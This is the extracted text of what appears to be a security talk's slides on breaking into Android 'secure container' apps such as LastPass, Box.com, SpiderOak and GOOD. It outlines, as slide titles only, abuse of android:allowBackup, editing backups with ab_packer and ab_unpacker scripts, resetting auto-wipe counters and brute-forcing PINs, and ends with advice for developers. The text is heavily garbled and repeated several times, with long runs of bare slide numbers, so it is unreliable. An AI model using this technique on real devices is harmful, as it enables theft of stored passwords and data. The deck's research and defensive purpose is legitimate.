Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



to the data



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

